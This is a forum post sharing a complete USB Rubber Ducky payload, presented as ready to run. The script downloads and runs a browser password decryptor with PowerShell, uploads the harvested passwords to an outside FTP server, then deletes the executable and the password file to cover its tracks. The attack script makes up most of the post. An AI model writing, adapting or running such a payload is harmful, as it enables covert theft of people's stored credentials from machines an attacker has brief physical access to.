crashie Posted March 7, 2013 Share Posted March 7, 2013 (edited) Have put together different parts to get what I needed and it works. It may need some fine-tuning but it's the first payload I've ran successfully that really does something :P (got my rubber ducky yesterday). What it does is that it downloads a browser password decryptor and executes it and saves the passwords to a .htm file and then it uploads the .htm to an FTP and when the upload is finished it quits and delete the executable together with the .htm file containing all the passwords. This is how it looks like, and yeah.. don't laugh :P It's my first attempt and I think you can guess what I will be doing this weekend :P I will try to make it upload the passwords to a server with PHP instead. But here's the script ready to run, well.. at least it works :P Any attempts to help with the fine tuning is welcome :) But I do as always.. learning by doing ;) GUI R DELAY 200 STRING cmd ENTER DELAY 50 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://websitecom/file.dba','%TEMP%\pass.exe'); Start-Process "%TEMP%\pass.exe pass.htm" DELAY 50 ENTER DELAY 2000 STRING cd %USERPROFILE% ENTER DELAY 50 STRING ftp ENTER DELAY 50 STRING o ENTER DELAY 50 STRING ftp.website.com 21 ENTER DELAY 50 STRING username ENTER DELAY 50 STRING password ENTER DELAY 100 STRING put pass.htm ENTER DELAY 1000 STRING bye ENTER STRING erase /Q %TEMP%\pass.exe %UserProfile%\pass.htm ENTER DELAY 500 STRING exit ENTER Edited March 8, 2013 by midnitesnake formatting Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.